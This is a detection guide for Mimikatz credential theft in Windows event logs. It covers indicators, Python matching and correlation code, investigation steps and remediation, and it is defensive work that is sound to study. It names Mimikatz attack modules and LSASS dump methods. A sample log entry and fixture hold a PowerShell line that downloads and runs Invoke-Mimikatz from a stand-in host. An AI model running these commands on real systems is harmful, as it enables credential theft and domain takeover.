EventPeeker

Detect Mimikatz — LSASS Dumping, DCSync & Credential Theft Indicators

Mimikatz is the most widely used credential theft tool in post-exploitation. It can extract plaintext passwords and NTLM hashes from LSASS memory, dump the SAM and NTDS databases, perform DCSync attacks, forge Kerberos tickets, and enable pass-the-hash — all from a single toolkit. Detecting Mimikatz requires a multi-signal approach: no single event ID is definitive.

Severity

Critical

ATT&CK Tactic

Credential Access

Common attacker usage

  • sekurlsa::logonpasswords — dumps plaintext passwords and NTLM hashes from LSASS memory
  • lsadump::dcsync — impersonates a DC to extract any account's hash via AD replication without touching disk
  • lsadump::sam — dumps local SAM database hashes by accessing registry hives
  • kerberos::golden — forges a Golden Ticket using the krbtgt hash for persistent domain access
  • sekurlsa::pth — performs pass-the-hash to authenticate as any account using only the NTLM hash
  • misc::wdigest — re-enables WDigest authentication so cleartext passwords are cached in LSASS
  • Invoke-Mimikatz — PowerShell wrapper that reflectively loads Mimikatz entirely in memory, bypassing disk-based AV

Investigate immediately if

  • Event 4688 shows mimikatz.exe, mimidrv.sys, or mimilib.dll — or a process from an unexpected path accessing LSASS
  • Event 4663 shows LSASS, SAM, or NTDS.dit accessed by a non-system, non-AV process
  • Event 4104 contains keywords: Invoke-Mimikatz, sekurlsa, lsadump, kerberos::golden, or dcsync
  • Event 4662 shows DS-Replication-Get-Changes-All from a user account (not a machine account)
  • Event 4673 shows SeDebugPrivilege used by a process that is not a known system or security tool
  • Windows Defender or AV fires on mimikatz-related signatures — even if remediated, investigate what ran before detection

MITRE ATT&CK

Technique

T1003 · OS Credential Dumping

Tactic

Credential Access


Security Relevance

Mimikatz is present in the majority of advanced intrusions, ransomware campaigns, and nation-state operations. Its modular design means a single execution can yield domain-wide credential access: LSASS dumping exposes active user sessions, DCSync yields every domain account hash, and Golden Ticket forgery enables persistence that survives password resets. Detecting even one Mimikatz indicator warrants immediate incident response — it is rarely a false positive and almost always means the environment is already compromised.

Indicators of Malicious Use

  • Event 4688: Process named mimikatz.exe, mimilib.dll, or mimidrv.sys — or any process with 'mimi' in the name
  • Event 4688: Command line contains sekurlsa, lsadump, kerberos::golden, privilege::debug, or token::elevate
  • Event 4663: ObjectName contains lsass.exe, \SAM, ntds.dit, or system32\config — accessed by a user-space process
  • Event 4104: Script block contains Invoke-Mimikatz, DumpCreds, sekurlsa::, or lsadump::
  • Event 4662: Replication GUIDs (1131f6aa, 1131f6ad) from a non-DC account — DCSync module
  • Event 4673: SeDebugPrivilege (SeTcbPrivilege) requested by an unexpected process — Mimikatz requires this to access LSASS
  • Registry modification: HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest → UseLogonCredential = 1 — enables cleartext password caching
  • Sysmon Event 10: GrantedAccess 0x1010, 0x1038, or 0x143a on lsass.exe from a user process
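The indicator list above can be turned directly into matching rules. The following is an added example (not EventPeeker's code) that encodes each indicator as a check over simplified event records: the dict keys (`new_process_name`, `object_name`, `script_block`, `properties`, `granted_access`, and so on) and the `EXPECTED_PROCESSES` allow-list are assumptions for the example, not the real EVTX field names, and the sample records at the bottom are constructed, not real telemetry.

```python
"""Indicator matching for the Mimikatz signals listed above.

Added example, not EventPeeker's code. Each event is a plain dict in a
constructed, simplified shape (the key names are assumptions, not the
real EVTX field names). The rules are the indicators from the list.
"""

# DS-Replication-Get-Changes / -All GUID prefixes seen in 4662 Properties
DCSYNC_GUID_PREFIXES = ("1131f6aa", "1131f6ad")
# Sysmon Event 10 GrantedAccess values typical of LSASS credential dumping
SUSPICIOUS_LSASS_ACCESS = {"0x1010", "0x1038", "0x143a"}
# Keyword sets taken from the indicator list (compared case-insensitively)
CMDLINE_KEYWORDS = ("sekurlsa", "lsadump", "kerberos::golden", "privilege::debug", "token::elevate")
SCRIPT_KEYWORDS = ("invoke-mimikatz", "dumpcreds", "sekurlsa::", "lsadump::")
SENSITIVE_OBJECTS = ("lsass.exe", "\\sam", "ntds.dit", "system32\\config")
WDIGEST_KEY = "hklm\\system\\currentcontrolset\\control\\securityproviders\\wdigest"
# Assumed allow-list of processes expected to touch LSASS or hold SeDebugPrivilege;
# tune to the environment (EDR/AV binaries belong here too)
EXPECTED_PROCESSES = {
    "c:\\windows\\system32\\svchost.exe",
    "c:\\windows\\system32\\wbem\\wmiprvse.exe",
    "c:\\windows\\system32\\csrss.exe",
}


def _low(ev, key):
    """Field value lowercased, '' if absent, so matching is case-insensitive."""
    return str(ev.get(key, "")).lower()


def match_indicators(ev):
    """Return the indicator names that one event matches (empty list if none)."""
    hits = []
    eid = ev.get("event_id")
    source = ev.get("source", "security")

    if source == "sysmon" and eid == 10:
        if (_low(ev, "target_image").endswith("\\lsass.exe")
                and _low(ev, "granted_access") in SUSPICIOUS_LSASS_ACCESS
                and _low(ev, "source_image") not in EXPECTED_PROCESSES):
            hits.append("sysmon10:lsass-access")
        return hits

    if eid == 4688:
        exe = _low(ev, "new_process_name").rsplit("\\", 1)[-1]
        if "mimi" in exe:
            hits.append("4688:mimikatz-binary")
        if any(k in _low(ev, "command_line") for k in CMDLINE_KEYWORDS):
            hits.append("4688:mimikatz-cmdline")
    elif eid == 4663:
        obj = _low(ev, "object_name")
        if (any(s in obj for s in SENSITIVE_OBJECTS)
                and _low(ev, "process_name") not in EXPECTED_PROCESSES):
            hits.append("4663:sensitive-object-access")
    elif eid == 4104:
        if any(k in _low(ev, "script_block") for k in SCRIPT_KEYWORDS):
            hits.append("4104:mimikatz-script")
    elif eid == 4662:
        # Machine accounts end in '$'; a user account requesting replication is the DCSync signature
        if (any(g in _low(ev, "properties") for g in DCSYNC_GUID_PREFIXES)
                and not _low(ev, "account_name").endswith("$")):
            hits.append("4662:dcsync")
    elif eid == 4673:
        if ("sedebugprivilege" in _low(ev, "privileges")
                and _low(ev, "process_name") not in EXPECTED_PROCESSES):
            hits.append("4673:unexpected-sedebug")
    elif eid == 4657:
        if (_low(ev, "object_name").startswith(WDIGEST_KEY)
                and _low(ev, "value_name") == "uselogoncredential"
                and _low(ev, "new_value") == "1"):
            hits.append("4657:wdigest-enabled")
    return hits


def scan(events):
    """Map each event's record id to its matched indicators, skipping clean events."""
    return {ev["record_id"]: h for ev in events if (h := match_indicators(ev))}


# Constructed sample records (not real telemetry); paths mirror the example log entry
SAMPLE_EVENTS = [
    {"record_id": 1, "event_id": 4688, "new_process_name": "C:\\Users\\jsmith\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe", "command_line": "mimikatz.exe privilege::debug sekurlsa::logonpasswords"},
    {"record_id": 2, "event_id": 4688, "new_process_name": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe"},
    {"record_id": 3, "event_id": 4673, "privileges": "SeDebugPrivilege", "process_name": "C:\\Users\\jsmith\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe"},
    {"record_id": 4, "event_id": 4662, "account_name": "jsmith", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"record_id": 5, "event_id": 4662, "account_name": "DC01$", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"record_id": 6, "event_id": 4657, "object_name": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest", "value_name": "UseLogonCredential", "new_value": "1"},
    {"record_id": 7, "event_id": 4104, "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://evil/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"},
    {"record_id": 8, "source": "sysmon", "event_id": 10, "source_image": "C:\\Users\\jsmith\\AppData\\Local\\Temp\\update.exe", "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1010"},
]

if __name__ == "__main__":
    for rid, hits in scan(SAMPLE_EVENTS).items():
        print(rid, hits)
```

Record 5 is deliberately a machine account (`DC01$`) performing replication, which is normal DC-to-DC traffic and must not fire; record 2 is an ordinary process creation. Everything else in the sample set matches exactly one rule, except the renamed-binary case: a Mimikatz binary renamed to `update.exe` only shows up through the Sysmon 10 or 4673 rules, which is why the name-based 4688 check is never the only rule deployed.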

Example Log Entry

Log Name: Security
Event ID:  4688
Level:     Information

A new process has been created.

Creator Subject:
  Account Name:     jsmith
  Account Domain:   CORP

Process Information:
  New Process ID:   0x1a4
  New Process Name: C:\Users\jsmith\Downloads\mimikatz_trunk\x64\mimikatz.exe
  Token Elevation:  TokenElevationTypeFull

--- Also watch for PowerShell variant ---

Event ID: 4104 (PowerShell Script Block)
Script Block Contents:
  Invoke-Mimikatz -DumpCreds
  IEX (New-Object Net.WebClient).DownloadString('http://evil/Invoke-Mimikatz.ps1')

Investigation Steps

  1. Search Event 4688 for mimikatz.exe and common variants — attackers frequently rename the binary (svchost.exe, lsass.exe, update.exe). Focus on process path: any LSASS-accessing process in AppData, Temp, Downloads, or a user's home directory is an IOC regardless of name.
  2. Check Event 4673 for SeDebugPrivilege — Mimikatz calls privilege::debug before any LSASS operation. The process requesting SeDebugPrivilege should be a known security tool or Windows process. An unexpected requestor narrows the search.
  3. Search Event 4104 (PowerShell script blocks) for: Invoke-Mimikatz, sekurlsa, lsadump, DumpCreds, kerberos::golden. Attackers often load Mimikatz entirely in memory via PowerShell to avoid disk-based detection.
  4. Check Event 4662 for DCSync activity — the lsadump::dcsync module leaves a distinct 4662 signature with DS-Replication-Get-Changes-All from a user account. If found, treat as a full domain compromise.
  5. Search Event 4663 for LSASS access — the sekurlsa modules access lsass.exe memory. The accessing process name will either be mimikatz.exe (if unmodified) or a renamed binary. Cross-reference with 4688 to identify the process.
  6. Check for WDigest re-enablement: Event 4657 or 4663 showing writes to HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest with UseLogonCredential = 1. This is a Mimikatz pre-step to ensure future cleartext passwords are cached.
  7. Determine what accounts were active on the system — any account logged in during the Mimikatz execution window should be treated as compromised. Check 4624 events for the hour before and after.
  8. Assume full compromise and initiate incident response: isolate the host, rotate all credentials active at the time of compromise, perform double krbtgt reset if DCSync was used, and audit for persistence mechanisms (scheduled tasks, new accounts, registry run keys).
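The steps above are a correlation exercise: start from the suspicious 4688, cross-reference the same process ID into 4673 and 4663, widen to the host's 4624 logons for the hour either side, and check 4662 domain-wide because DCSync is logged on the domain controller, not the workstation. The following is an added example (not EventPeeker's code) that carries out that correlation over constructed records; the `time`, `host`, `process_id` and other field names are assumptions for the example, and the sample timeline is constructed, not real telemetry.

```python
"""Correlating the investigation steps above around one suspicious process.

Added example, not EventPeeker's code. Events are constructed dicts with
an ISO-8601 'time' field; the field names are assumptions. Given the
4688 record that started the investigation, it gathers the other signals
from the same host in a +/- 1 hour window (step 7), checks DCSync across
all hosts (step 4), and derives the response actions from step 8.
"""
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)  # step 7: the hour before and after the execution


def _t(ev):
    return datetime.fromisoformat(ev["time"])


def triage(events, anchor):
    """Summarise what happened on anchor['host'] around the anchor 4688 event."""
    start, end = _t(anchor) - WINDOW, _t(anchor) + WINDOW
    on_host = [e for e in events if e.get("host") == anchor["host"] and start <= _t(e) <= end]
    pid = anchor.get("process_id")

    def same_pid(e, eid):
        return e["event_id"] == eid and e.get("process_id") == pid

    summary = {
        "window": (start.isoformat(), end.isoformat()),
        # step 2: the suspect process asked for SeDebugPrivilege
        "sedebug_by_suspect": any(
            same_pid(e, 4673) and "sedebugprivilege" in e.get("privileges", "").lower() for e in on_host),
        # step 5: the suspect process opened lsass.exe
        "lsass_access_by_suspect": any(
            same_pid(e, 4663) and e.get("object_name", "").lower().endswith("lsass.exe") for e in on_host),
        # step 6: WDigest caching switched back on
        "wdigest_enabled": any(
            e["event_id"] == 4657 and "wdigest" in e.get("object_name", "").lower()
            and str(e.get("new_value")) == "1" for e in on_host),
        # step 4: DCSync is recorded on the DC, so look across every host, not just this one
        "dcsync_seen": any(
            e["event_id"] == 4662 and "1131f6ad" in e.get("properties", "").lower()
            and not e.get("account_name", "").endswith("$") for e in events),
    }
    # step 7: every (non-machine) account with a logon on the host in the window is treated as compromised
    summary["accounts_to_rotate"] = sorted(
        {e["account_name"] for e in on_host if e["event_id"] == 4624 and not e["account_name"].endswith("$")})
    # step 8: response actions follow from what was found
    actions = ["isolate host " + anchor["host"], "rotate credentials for accounts_to_rotate"]
    if summary["dcsync_seen"]:
        actions.append("double krbtgt reset (every domain hash assumed exposed)")
    if summary["wdigest_enabled"]:
        actions.append("set WDigest UseLogonCredential back to 0")
    summary["actions"] = actions
    return summary


# Constructed sample timeline (not real telemetry)
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:55:00", "host": "WS01", "event_id": 4624, "account_name": "jsmith"},
    {"time": "2024-05-01T10:00:00", "host": "WS01", "event_id": 4624, "account_name": "svc_backup"},
    {"time": "2024-05-01T10:14:00", "host": "WS01", "event_id": 4688, "process_id": "0x1a4",
     "new_process_name": "C:\\Users\\jsmith\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe"},
    {"time": "2024-05-01T10:14:05", "host": "WS01", "event_id": 4673, "process_id": "0x1a4", "privileges": "SeDebugPrivilege"},
    {"time": "2024-05-01T10:14:07", "host": "WS01", "event_id": 4663, "process_id": "0x1a4", "object_name": "C:\\Windows\\System32\\lsass.exe"},
    {"time": "2024-05-01T10:30:00", "host": "WS01", "event_id": 4624, "account_name": "da_admin"},
    {"time": "2024-05-01T10:31:00", "host": "WS01", "event_id": 4624, "account_name": "WS01$"},
    {"time": "2024-05-01T13:00:00", "host": "WS01", "event_id": 4624, "account_name": "later_user"},  # outside the window
    {"time": "2024-05-01T10:20:00", "host": "DC01", "event_id": 4662, "account_name": "svc_backup",
     "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]
ANCHOR = SAMPLE_EVENTS[2]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_EVENTS, ANCHOR).items():
        print(key, value)
```

In the sample, `later_user` logs on well after the window and is not listed for rotation, the workstation's own machine account is excluded, and the 4662 on DC01 still drives the krbtgt recommendation even though it is not on the compromised host. The exact window length and the decision to include all logon types are policy choices; the point is that host-local and domain-wide signals have different scopes.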


Common False Positives

  • Penetration testing and red team engagements — Mimikatz is a standard red team tool. Verify against your change management calendar before escalating.
  • Security research environments — Mimikatz is used for legitimate security research. Air-gapped or isolated lab environments may trigger these signatures intentionally.
  • Windows Defender and EDR testing — some security teams test their detection capabilities by running Mimikatz in controlled environments. Verify with the security team.
  • Does Windows Defender detect Mimikatz? Yes — Windows Defender detects known Mimikatz signatures and will generate Event 1116/1117. However, obfuscated or modified versions frequently bypass signature detection. Behavioral indicators (4663, 4673, 4662) remain reliable.

Remediation

  • Rotate all credentials active during the compromise window — NTLM hashes extracted from LSASS can be used immediately for pass-the-hash. Every account with an active session on the compromised host is at risk.
  • If DCSync was detected, perform a double krbtgt password reset — reset the krbtgt account password, wait 10 hours, then reset it again. This invalidates any forged Golden Tickets.
  • Enable LSA Protection (RunAsPPL) — makes LSASS a Protected Process Light, blocking unsigned tools from accessing LSASS memory. Set HKLM\SYSTEM\CurrentControlSet\Control\Lsa → RunAsPPL = 1.
  • Enable Credential Guard — stores credentials in a Hyper-V isolated container. Mimikatz's sekurlsa modules cannot extract credentials protected by Credential Guard.
  • Disable WDigest authentication — set HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest → UseLogonCredential = 0 (or ensure it is absent). This prevents cleartext password caching.
  • Enable Protected Users security group for all privileged accounts — prevents NTLM authentication and Kerberos delegation, significantly reducing the value of extracted hashes.
  • Deploy Attack Surface Reduction (ASR) rules — specifically 'Block credential stealing from the Windows local security authority subsystem' (LSASS protection rule).

Related Event IDs

4688 · Process creation — mimikatz.exe or renamed variant launched
4663 · Object access — LSASS, SAM, or NTDS.dit accessed for credential extraction
4104 · PowerShell script block — Invoke-Mimikatz or lsadump commands
4662 · Directory service access — DCSync module replication activity
4673 · SeDebugPrivilege — required by Mimikatz before LSASS access
4657 · Registry write — WDigest re-enablement for cleartext caching

Frequently Asked Questions

Does Windows Defender detect Mimikatz?
Windows Defender Antivirus detects many Mimikatz variants by signature, but attackers routinely bypass detection using obfuscation, reflective loading (running from memory without touching disk), or custom forks. Defender for Identity (requires DC sensor) detects credential theft patterns at the network level. You should not rely on AV alone — assume a motivated attacker has evaded signatures.
Why is lsass.exe being accessed?
LSASS access (Event ID 4663 with the target path pointing to lsass.exe) is triggered by credential dumping tools including Mimikatz sekurlsa::logonpasswords, ProcDump (-ma lsass.exe), Task Manager dump, comsvcs.dll MiniDump, and nanodump. Legitimate LSASS access is rare and comes from known system processes. Any unexpected process accessing LSASS should be investigated.
What event IDs does Mimikatz generate?
Mimikatz generates different events depending on the module used: 4663 (LSASS process access for sekurlsa modules), 4662 (directory service access for lsadump::dcsync), 4104 (PowerShell script block logging if using Invoke-Mimikatz), 4673 (sensitive privilege use for SeDebugPrivilege), and 4657 (registry write if enabling WDigest via misc::wdigest). No single event ID is definitive — correlation across multiple IDs is required.
Can Mimikatz run without administrator rights?
Most Mimikatz modules require SYSTEM or local Administrator rights. sekurlsa::logonpasswords requires SeDebugPrivilege, which requires local admin. lsadump::dcsync requires domain replication rights (Domain Admin or explicitly delegated). Some modules like vault::list and dpapi operate at lower privilege levels but yield less sensitive data.
